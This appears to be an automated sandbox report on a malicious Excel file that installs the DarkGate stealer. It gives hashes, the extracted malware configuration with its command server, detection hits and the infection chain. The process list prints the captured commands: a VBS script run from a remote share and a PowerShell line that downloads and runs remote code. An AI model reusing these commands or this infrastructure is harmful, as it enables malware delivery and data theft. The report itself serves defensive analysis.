Analysis
max time kernel: 134s
max time network: 144s
platform: windows10-1703_x64
resource: win10-20240221-en
resource tags: arch:x64, arch:x86, image:win10-20240221-en, locale:en-us, os:windows10-1703-x64, system
submitted: 28/02/2024, 21:20
Static task: static1
Behavioral task: behavioral1
General
Target: scan-28-02-24_4761.xlsx
Size: 29KB
MD5: 78d125fd15824e5ca1a3f7d99d7d8e54
SHA1: e905149cd68a5961ee9fb4760c29f17b3fa6b524
SHA256: 535dd498b529c109d05d517f329897f64fd15ea57f841f4deb111262b011fc60
SHA512: 266620784bb52ebbec6e533ca306bca8f753b311a6a76dcd3759e0614bf6f64dc124363b747fbfecc09fab3edd4da2c4e0908ae9a04a67c5438e6a0bbba63fd3
SSDEEP: 768:wnEQpllh7tAafroiianGoHoJ+yWWn0Wht3p1:nQJh7Lro4ntD+0AZ1
Malware Config
Extracted
darkgate
admin888
cayennesxque.boo
anti_analysis: true
anti_debug: false
anti_vm: true
c2_port: 80
check_disk: true
check_ram: false
check_xeon: false
crypter_au3: false
crypter_dll: false
crypter_raw_stub: false
internal_mutex: ekoRFSqn
minimum_disk: 50
minimum_ram: 7000
ping_interval: 6
rootkit: false
startup_persistence: true
username: admin888
Signatures

Detect DarkGate stealer (2 IoCs)
resource | yara_rule
behavioral1/memory/2848-257-0x0000000005840000-0x0000000005B8F000-memory.dmp | family_darkgate_v6
behavioral1/memory/2848-258-0x0000000005840000-0x0000000005B8F000-memory.dmp | family_darkgate_v6

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1640 | 1328 | WScript.exe | 72

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
29 | 1976 | powershell.exe
31 | 1976 | powershell.exe
32 | 1976 | powershell.exe
33 | 1976 | powershell.exe

Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
pid | Process
2848 | AutoIt3.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 5 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AutoIt3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | AutoIt3.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
1328 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid | Process
1976 | powershell.exe
1976 | powershell.exe
1976 | powershell.exe
1976 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1976 | powershell.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
1328 | EXCEL.EXE
1328 | EXCEL.EXE

Suspicious use of SetWindowsHookEx (12 IoCs)
pid | Process
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE
1328 | EXCEL.EXE

Suspicious use of WriteProcessMemory (7 IoCs)
description | pid | Process | procid_target
PID 1328 wrote to memory of 1640 | 1328 | EXCEL.EXE | 76
PID 1328 wrote to memory of 1640 | 1328 | EXCEL.EXE | 76
PID 1640 wrote to memory of 1976 | 1640 | WScript.exe | 77
PID 1640 wrote to memory of 1976 | 1640 | WScript.exe | 77
PID 1976 wrote to memory of 2848 | 1976 | powershell.exe | 79
PID 1976 wrote to memory of 2848 | 1976 | powershell.exe | 79
PID 1976 wrote to memory of 2848 | 1976 | powershell.exe | 79

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 1328, depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\scan-28-02-24_4761.xlsx"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

C:\Windows\System32\WScript.exe (PID 1640, depth 2)
Command line: "C:\Windows\System32\WScript.exe" "\\147.45.197.186\share\scan.vbs"
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1976, depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'cayennesxque.boo/qdfjfvph')
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory

C:\temp\AutoIt3.exe (PID 2848, depth 4)
Command line: "C:\temp\AutoIt3.exe" script.a3x
- Executes dropped EXE
- Checks processor information in registry
Downloads